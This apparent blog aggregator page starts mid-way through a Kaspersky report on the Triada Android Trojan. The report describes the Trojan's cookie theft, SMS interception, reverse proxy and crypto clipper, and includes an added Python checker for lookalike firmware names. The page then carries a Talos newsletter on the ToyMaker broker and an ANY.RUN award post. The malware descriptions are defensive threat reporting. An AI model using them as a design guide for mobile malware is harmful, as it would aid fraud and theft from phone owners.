TikTok. This module can collect a lot of data about the victim’s account from cookie files in the internal directory, and also extract data required for communicating with the TikTok API.
Facebook. Triada is armed with two modules for this app. One of them steals authentication cookies, and the other sends information about the infected device to the C2 server.
Of course, there are also modules for SMS and calls. The first SMS module allows the malware to filter all incoming messages and extract codes from them, respond to some messages (likely to subscribe victims to paid services) and send arbitrary SMS messages when instructed by the C2 server. The second, auxiliary module disables the built-in Android protection against SMS Trojans that requests user permission before sending messages to short codes (Premium SMS), which could be used to confirm paid subscriptions.
The call module embeds itself in the phone app, but it’s most likely still under development. We discovered that it partially implements phone number spoofing — something we expect to be completed soon.
Another module, a reverse proxy, turns the victim’s smartphone into a reverse proxy server, giving attackers access to arbitrary IP addresses on behalf of the victim.
Not unexpectedly, Triada also targets crypto owners, with a special surprise awaiting them: a clipper. The Trojan watches the clipboard for crypto wallet addresses, substituting one of the attackers’ own. A crypto stealer analyzes the victim’s activity, replacing crypto wallet addresses with fraudulent addresses anywhere it can, whenever an attempt is made to withdraw cryptocurrency. It even interferes with button tap handlers inside apps and replaces images with generated QR codes that link to the attackers’ wallet addresses. The criminals have managed to steal more than US$264 000 in various cryptocurrencies since June 13, 2024 with the help of these tools.
See our Securelist report for a full list of Triada features and a detailed technical analysis.
How the malware infiltrates smartphones
In every infection case that we are aware of, the firmware name on the device differed from the official one by a single letter. For example, the official firmware was TGPMIXM, while the infected phones had TGPMIXN. We found posts on relevant discussion boards where users complained about counterfeit devices purchased from online stores.
It’s likely that a stage in the supply chain was compromised, while the stores had no idea they were distributing devices infected with Triada. Meanwhile, it’s practically impossible to determine exactly when the malware was placed inside the smartphones.
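A check for the single-letter firmware name mismatch described above, added here as an example and not part of the Kaspersky article. The official name TGPMIXM and the infected name TGPMIXN come from the article; the list of official names (which a vendor's published build list would populate) and the one-edit threshold are assumptions.

```python
"""Flag firmware names that are one edit away from an official name.

Added example, not part of the Kaspersky article. TGPMIXM (official) and
TGPMIXN (infected) are the names given in the article; the official-name list
and the distance threshold are assumptions.
"""

OFFICIAL_FIRMWARE = {"TGPMIXM"}  # extend with the vendor's published names (assumption)
MAX_DISTANCE = 1  # a single substituted, inserted or deleted character


def edit_distance(a, b):
    """Levenshtein distance via the classic dynamic-programming table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        cur = [i]
        for j, cb in enumerate(b, start=1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]


def check_firmware(name, official=OFFICIAL_FIRMWARE, max_distance=MAX_DISTANCE):
    """Classify a reported firmware name.

    Returns ("official", name) for an exact match, ("lookalike", closest)
    when the name is within max_distance edits of an official name, and
    ("unknown", None) otherwise. Comparison is case-insensitive.
    """
    norm = name.strip().upper()
    if norm in official:
        return ("official", norm)
    closest = min(official, key=lambda o: edit_distance(norm, o))
    if edit_distance(norm, closest) <= max_distance:
        return ("lookalike", closest)
    return ("unknown", None)


if __name__ == "__main__":
    for reported in ("TGPMIXM", "TGPMIXN", "tgpmixm", "ABCDEFG"):
        print(reported, "->", check_firmware(reported))
```

On an Android device the build string is typically read with `adb shell getprop ro.build.display.id`, though which property carries the vendor's firmware name varies by manufacturer. A "lookalike" result is a reason to treat the device as untrusted and reflash it from official firmware, as the article recommends; an "unknown" result simply means the official list needs extending.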
How to protect yourself from Triada
The new version of the Trojan was found pre-installed on counterfeit devices. Therefore, the best way to avoid Triada infection is to buy smartphones from authorized dealers only. If you suspect that your phone may have been infected with Triada (or another Trojan), here are our recommendations.
Refrain from using any of the potentially compromised apps listed above or making any financial transactions — including cryptocurrency.
If Triada is found on the device, reflash the smartphone with the official firmware yourself, or contact the local service center. Expect sudden changes to your smartphone’s specs: besides the pre-installed Trojan, the fake firmware often overstated the RAM and storage.
Posted by admin, 2025-04-25: Triada: a Trojan pre-installed on Android smartphones out of the box | Kaspersky official blog
Welcome to this week’s edition of the Threat Source newsletter.
“Be curious, not judgmental,” Ted Lasso says, misattributing Walt Whitman. We forgive Ted because… well, he’s Ted Lasso.
If you’ve not watched the first season of Ted Lasso, there is a defining moment where Ted confronts a nefarious bully. While putting him in his place with kindness and skill, Ted refers to this quote. It’s a defining moment not only for Ted but for the secondary and tertiary characters in the scene. One of the questions that I’m asked most when public speaking is “How do I get into Talos?” For people considering a new career, it’s “How do I get into cybersecurity?” To all those questions, my answer is “Be curious, not judgmental.”
I think there is no greater skill necessary in security than intellectual curiosity. If you have that, you can learn the rest. The hiring process to get in the door at Talos is extremely challenging and the candidates are incredible. That’s why when I interview candidates for various roles in Talos I rarely, if ever, fixate on a niche skillset, instead focusing on the prospective employee’s intellectual curiosity. I ask weird questions that don’t seem related to the specific job role, not in an effort to throw them off but simply because I am curious and hope that they are as well.
Do you like to read? Do you ever read books outside of your normal wheelhouse? What are some favorite fiction and non-fiction books? Do you have a favorite craft or hobby? How many different Linux distributions have you installed? What are your 5 favorite board games? Do you play video games, and if so, what are a few favorites from each platform and decade?
These kinds of questions help me identify what kind of innate curiosity that the prospective candidate possesses and from their answers we will invariably fall down a rabbit hole while my co-workers shake their heads at me in disdain.
Beyond that, I always listen for my favorite answer: “I don’t know, but…” There’s no better answer to a very difficult question than “I don’t know, but I’d probably try X,” or “I don’t know, but I’d love to learn…”
Barbecue sauce.
The one big thing
Cisco Talos has released a blog post on the initial access broker (IAB) we call “ToyMaker” — a financially-motivated threat actor. They deploy their custom-made backdoor we call “LAGTOY” and extract credentials from the victim enterprise. LAGTOY can be used to create reverse shells and execute commands on infected endpoints.
Why do I care?
A compromise by LAGTOY may result in access handover to a secondary threat actor. Specifically, we’ve observed ToyMaker hand over access to Cactus, a double extortion gang who employed their own tactics, techniques and procedures (TTPs) to carry out malicious actions across the victim’s network. Our blog details a timeline with turnaround time from ToyMaker to Cactus.
So now what?
Cisco Talos has released information to help ensure protection including techniques and related IOCs. Check out the blog post for full details.
Top security headlines of the week
Apple says zero-day bugs exploited against ‘specific targeted individuals’ using iOS. Apple has released new software updates across its product line to fix two security vulnerabilities, which the company said may have been actively used to hack customers running its mobile software, iOS. (TechCrunch)
Microsoft purges millions of cloud tenants in the wake of Storm-0558. In an effort to thwart state-sponsored activity stemming from preventable security issues, Microsoft is making significant efforts to purge inactive Azure cloud tenants and take comprehensive inventory of cloud and network assets. (DarkReading)
Researchers warn of critical flaw found in Erlang OTP SSH. The vulnerability could allow unauthenticated attackers to gain full access to a device. Many of these devices are widely used in IoT and telecom platforms. (cybersecuritydrive)
CISA flags actively exploited vulnerability in SonicWall SMA devices. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a security flaw impacting SonicWall Secure Mobile Access 100 Series gateways to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. (The Hacker News)
Posted by admin, 2025-04-24: Lessons from Ted Lasso for cybersecurity success
We are honored to announce that ANY.RUN became a gold winner at the annual Globee Business Awards 2025. The award aims to recognize and celebrate excellence in various industries worldwide, including cybersecurity.
Our solution, ANY.RUN’s TI Lookup, was named best in the Cyber Threat Intelligence category. We believe that threat intelligence is an essential aspect of ensuring the cybersecurity of organizations, and recognition in this sphere is important to us.
We’d like to thank you—our readers, partners, users of our products, and all fellow cybersecurity enthusiasts and professionals! The victory itself is not as important as the fact that it stands for continuous support from the community and acknowledgement of our high-quality products benefiting thousands of businesses.
What makes TI Lookup special
Homepage of ANY.RUN’s Threat Intelligence Lookup
TI Lookup is a search engine that gives users the opportunity to navigate ANY.RUN’s database of fresh and unique information on cyber attacks. It is continuously enriched with extensive data on the latest threats analyzed by 500,000 security professionals and 15,000 companies in ANY.RUN’s Interactive Sandbox.
As a result, it contains a wealth of indicators and events logged during analyses, including IOCs, IOAs, and IOBs.
Threat Intelligence Lookup helps you:
Pin existing IOCs to specific threats and discover additional indicators to update your detection capabilities.
Simplify and accelerate threat investigation thanks to the quick response time and access to up-to-date information.
Browse an extensive and regularly updated database of malware samples to get in-depth context on threats.
Increase the efficacy of incident response and triage by working on the tasks as a team.
Monitor evolving threats by subscribing to requests relevant to your company using Search Updates.
Accelerate triage and threat identification: Uncover attacks behind alerts with quick indicator search to block them before they escalate.
Improve incident response: Collect attack IOCs, IOAs, IOBs and TTPs, and observe their full execution inside the sandbox for a more accurate response.
Strengthen proactive security: Enrich your defense with fresh indicators from the latest samples to prevent attacks, including with auto-updates.
Simplify threat hunting: Run proactive searches on indicators found in your network to pin them to actual threats.
Enhance forensic analysis: investigate system events and indicators with the help of TI Lookup to discover missing attack details.
Recognition
It means a lot to us that the expert committee once again expressed their appreciation of our efforts. Previously our flagship product ANY.RUN’s Interactive Sandbox was announced a silver winner in the Outstanding Threat Detection and Response category at Globee Awards 2025.
About ANY.RUN
ANY.RUN creates products for malware analysts and SOC teams, such as ANY.RUN’s Interactive Sandbox, TI Lookup and TI Feeds. They help accelerate the work of security specialists of all tiers and benefit businesses by providing helpful insights that allow them to minimize harmful consequences of cyber attacks or avoid them altogether.
Posted by admin, 2025-04-24: ANY.RUN Becomes a Gold Winner in Threat Intelligence at Globee Awards 2025